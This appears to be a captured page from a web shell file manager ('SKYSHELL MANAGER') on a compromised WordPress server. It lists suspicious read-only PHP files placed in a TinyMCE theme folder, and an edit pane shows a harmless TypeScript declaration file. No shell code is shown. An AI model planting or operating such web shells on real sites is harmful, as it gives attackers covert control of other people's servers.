📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: 2015.d.ts
import ES2015 = require('../es2015'); interface ES2015Operations extends Record<keyof ES2015, string> { // Unimplemented operations: Construct: string; CreateArrayFromList: string; CreateListIterator: string; NormalCompletion: string; RegExpBuiltinExec: string; } declare const ES2015Operations: ES2015Operations; export = ES2015Operations;
Save